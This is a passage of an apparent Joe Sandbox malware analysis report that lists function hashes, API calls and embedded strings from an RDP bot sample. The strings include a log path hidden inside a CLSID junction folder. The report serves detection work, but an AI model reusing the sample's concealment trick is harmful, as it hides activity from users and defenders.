    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: _errno$fclosefopenfwrite
    • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
    • API String ID: 608220805-544371937
    • Opcode ID: 0dce1079dbfb5dc565595f50d15f60d1d2a5a1bebb43830eefa37ed7cc94c446
    • Instruction ID: 0a9449825ce955904766144e1e0fe1256b9ee181fb71d3e12cd5c65de765c5b9
    • Opcode Fuzzy Hash: 0dce1079dbfb5dc565595f50d15f60d1d2a5a1bebb43830eefa37ed7cc94c446
    • Instruction Fuzzy Hash: EE51B423A1864383FA109B55D9503F42369AF54B84F498A36E90DE7692DF3EF502F30A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: strlen$CreateDirectoryErrorLast$strcpy
    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
    • API String ID: 1104438493-1059260517
    • Opcode ID: 35bc9f8dbae694f15c65205d47588c8a2ad6936f040b79d3d06f2a2b93be7b00
    • Instruction ID: 2a40d6480c2cb666d58c0c512652aadbb6a60efee82d82274860f3f3b56cab3f
    • Opcode Fuzzy Hash: 35bc9f8dbae694f15c65205d47588c8a2ad6936f040b79d3d06f2a2b93be7b00
    • Instruction Fuzzy Hash: 7D71AC21A0CE8F87FB619B17EC407B91241AF88774F5501B2D98E472F5EEECE8598B01
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: strlen$CreateDirectoryErrorLast$strcpy
    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
    • API String ID: 1104438493-1059260517
    • Opcode ID: 74d8aff9c1f85ae7413d121a3eeae0da39c630085a9af3950b26d4bf2913322c
    • Instruction ID: 10e47e573164ddd08be9b59b9bc6ed0cf0b0213e4fda7219fcf0cc2ad235bee0
    • Opcode Fuzzy Hash: 74d8aff9c1f85ae7413d121a3eeae0da39c630085a9af3950b26d4bf2913322c
    • Instruction Fuzzy Hash: 6E715BA2B0D74782FB325F14E8807B95351EB89785F541132DACE467FADE3DE8858B02
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
    • String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
    • API String ID: 3216678114-1460613360
    • Opcode ID: f6ce7aea18c6699f1e2cb8aaa6c441773b6b84546cb352a08ff0f9f4e49d6c0f
    • Instruction ID: 353e241d1e425f8a916312a54c09d59d99698174658e6538bc43449ffec3e607
    • Opcode Fuzzy Hash: f6ce7aea18c6699f1e2cb8aaa6c441773b6b84546cb352a08ff0f9f4e49d6c0f
    • Instruction Fuzzy Hash: 8B517113B1C61793FE205764A9813B8235AAF44B84F450932E50DE62E3DE6FB946F30B
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
    • String ID: %TEMP%$(package != NULL)$(target != NULL)$C:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
    • API String ID: 3066828623-21863935
    • Opcode ID: fa4f7efa52dbeaf0bc24b1f2719f783785f4c9ad8abfb8458d9086107e72eb43
    • Instruction ID: 2c0b46acd01a8987d8862fd3c8fac14caa7903253d69015947975bef9e5ce16c
    • Opcode Fuzzy Hash: fa4f7efa52dbeaf0bc24b1f2719f783785f4c9ad8abfb8458d9086107e72eb43
    • Instruction Fuzzy Hash: 9C81A063A0C64793FB109F14E8403BA6768FB44384F844531EA4DEB68ADF7EE509E709
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
    • String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
    • API String ID: 548194777-214984806
    • Opcode ID: 44709c66087d480dd46c90760e8c114c95b82e3d763f2883a4c80b46c0773f74
    • Instruction ID: 00f7d5ad44f05b6a11aead82f3ffa47cd78e5f2bbbaf9d2cc15cbf65b831d6ab
    • Opcode Fuzzy Hash: 44709c66087d480dd46c90760e8c114c95b82e3d763f2883a4c80b46c0773f74
    • Instruction Fuzzy Hash: 1981D623A1C64393FB609B15E4107B963AAAF84788F444831DA4DE7797DF3EE505E30A
    APIs
    • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001FC7A4F13D0,?,00007FF6EF668500,00007FF6EF651669), ref: 00007FF6EF6568B7
    • LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001FC7A4F13D0,?,00007FF6EF668500,00007FF6EF651669), ref: 00007FF6EF6568F0
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001FC7A4F13D0,?,00007FF6EF668500,00007FF6EF651669), ref: 00007FF6EF6569C5
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001FC7A4F13D0,?,00007FF6EF668500,00007FF6EF651669), ref: 00007FF6EF656AAA
    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001FC7A4F13D0,?,00007FF6EF668500,00007FF6EF651669), ref: 00007FF6EF656C1E
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: ErrorFileLast$CloseCreateHandleLock
    • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
    • API String ID: 2747014929-2960251455
    • Opcode ID: be39724d04e317b0adf5bb95a305d268c124e39e87b03d831ce14efb91c32fb1
    • Instruction ID: f1ae9090070c84ae3b71204a5a5d3cb6a4d7386161774e37792d5025a10cf40b
    • Opcode Fuzzy Hash: be39724d04e317b0adf5bb95a305d268c124e39e87b03d831ce14efb91c32fb1
    • Instruction Fuzzy Hash: BE815E62E0C74B83FA30A744A44037833589F11764F144A32D96EE66D3EE6FA985F34B
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
    • API String ID: 3154682637-708158336
    • Opcode ID: 59720e605f07cf00f7b3e6a0eb2fe6dcb1ad176796c9dd7124adee1b37e63f04
    • Instruction ID: 206e03ef89762473cad6fcd600fdb357e8a93914950f73856e546dace1ac5926
    • Opcode Fuzzy Hash: 59720e605f07cf00f7b3e6a0eb2fe6dcb1ad176796c9dd7124adee1b37e63f04
    • Instruction Fuzzy Hash: 2A5183B1A0C64282F6205B65E8402BA7752EF85BA4F140337D9EE477F9EE7CE5499700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
    • API String ID: 3154682637-708158336
    • Opcode ID: 08a4b01bbb4ca8986ec5fe618f39771ea5e7d8498fbdd25a8761da3d7d4182e2
    • Instruction ID: e8b45b79be7e114820ee9b046a86b3c2080dc23907336bab1b16c27052daf727
    • Opcode Fuzzy Hash: 08a4b01bbb4ca8986ec5fe618f39771ea5e7d8498fbdd25a8761da3d7d4182e2
    • Instruction Fuzzy Hash: 5A518061B08E4E83EB209B27EC002B96691EF95774F1413F5E8AD46AF5EEFDE5058700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
    • API String ID: 3154682637-708158336
    • Opcode ID: 9fc70c812d4a1464bb8872bcab90c1922926843d2b5615a3dd5e1254a0653fb6
    • Instruction ID: 439e93bb1d9e03de6ad842e4fb4cc48d1b4ec2d1126b0506d683e8403b41f2dd
    • Opcode Fuzzy Hash: 9fc70c812d4a1464bb8872bcab90c1922926843d2b5615a3dd5e1254a0653fb6
    • Instruction Fuzzy Hash: 1851C461A0CE4281EB209B9BEC053BF6698EF84774F9823B6D82D426F4DE7DF5058700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
    • API String ID: 3154682637-708158336
    • Opcode ID: 53de8601f913020fc363fbe923367388d67ffaaf6f648c3d0281c520f93d4c4c
    • Instruction ID: ba6237854a05914372f00b0cc8adeb73c5c546e7ce968352da356ac00c7a651f
    • Opcode Fuzzy Hash: 53de8601f913020fc363fbe923367388d67ffaaf6f648c3d0281c520f93d4c4c
    • Instruction Fuzzy Hash: DC51C221A0C64382EA209B25E804BB97A61EF45BA4F540337E9FE876F6DF7DE545C340
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
    • API String ID: 3154682637-708158336
    • Opcode ID: 73e29e2a7b89a0ff7a7e3ac32ed82f0bebae691cbd4a0bdb682babcfef2e7c2a
    • Instruction ID: 1a7f7a69bfcd799f6c5dafe123f2302f874c2cea1a40fb85e359b7d10452344e
    • Opcode Fuzzy Hash: 73e29e2a7b89a0ff7a7e3ac32ed82f0bebae691cbd4a0bdb682babcfef2e7c2a
    • Instruction Fuzzy Hash: 745183A2B0C74282E6356F19E8003BA6691EF847A4F140336EAEE477F5DE7DE5459B00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
    • API String ID: 1412730629-3633878399
    • Opcode ID: 5abe49d087058364e46ad2905a861be8bca4930353659010610e86f769bd5388
    • Instruction ID: 5c2b5abc877f5d3872f8fb5b4cb010999b14779b170c294736865dc5fb18e0f2
    • Opcode Fuzzy Hash: 5abe49d087058364e46ad2905a861be8bca4930353659010610e86f769bd5388
    • Instruction Fuzzy Hash: 4C5126A0F0E743A2FB308B24A8C03B83251AF09765F244777C5FE066F1DE6EA9959305
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
    • API String ID: 1412730629-3633878399
    • Opcode ID: b068334e6861a812b339efc78247bfa2848f357ddabbee0e87fbe87dba26481b
    • Instruction ID: 24a47dd8d607bbce7170685555f7344941672d97d336f7b19568c65e9a38823d
    • Opcode Fuzzy Hash: b068334e6861a812b339efc78247bfa2848f357ddabbee0e87fbe87dba26481b
    • Instruction Fuzzy Hash: 5251E660E4CF4F8BFB609B16BD8037822509F14374F6446B6C6AE062F5DEEDAD858346
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
    • API String ID: 1412730629-3633878399
    • Opcode ID: 3142162b986c3d4fa4473a6ccf2dbf757ae8bb3ab3cb342be710ce241183fefe
    • Instruction ID: d9728a3af9dac54489042bd08d9d1b2114836b41f13e9fd40f6d84b1414159d0
    • Opcode Fuzzy Hash: 3142162b986c3d4fa4473a6ccf2dbf757ae8bb3ab3cb342be710ce241183fefe
    • Instruction Fuzzy Hash: 7051F824E0CF4382FB205BD6EC8437B2298AF14374FA452B6D93E462F1DE6DB9859345
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
    • API String ID: 1412730629-3633878399
    • Opcode ID: 62f3ef80df156b3033b80c8e012c7cc465b8e78bc4d37df674804b746f9539f6
    • Instruction ID: b058785e4b12121d9cd5ebdde00a9d45819e5c1b65890bb4b6d1c21dd13698db
    • Opcode Fuzzy Hash: 62f3ef80df156b3033b80c8e012c7cc465b8e78bc4d37df674804b746f9539f6
    • Instruction Fuzzy Hash: 39510720E0C70382FB705758A5D43B922A4AF04766F654337C9FE162F2DE6DA986D382
    APIs
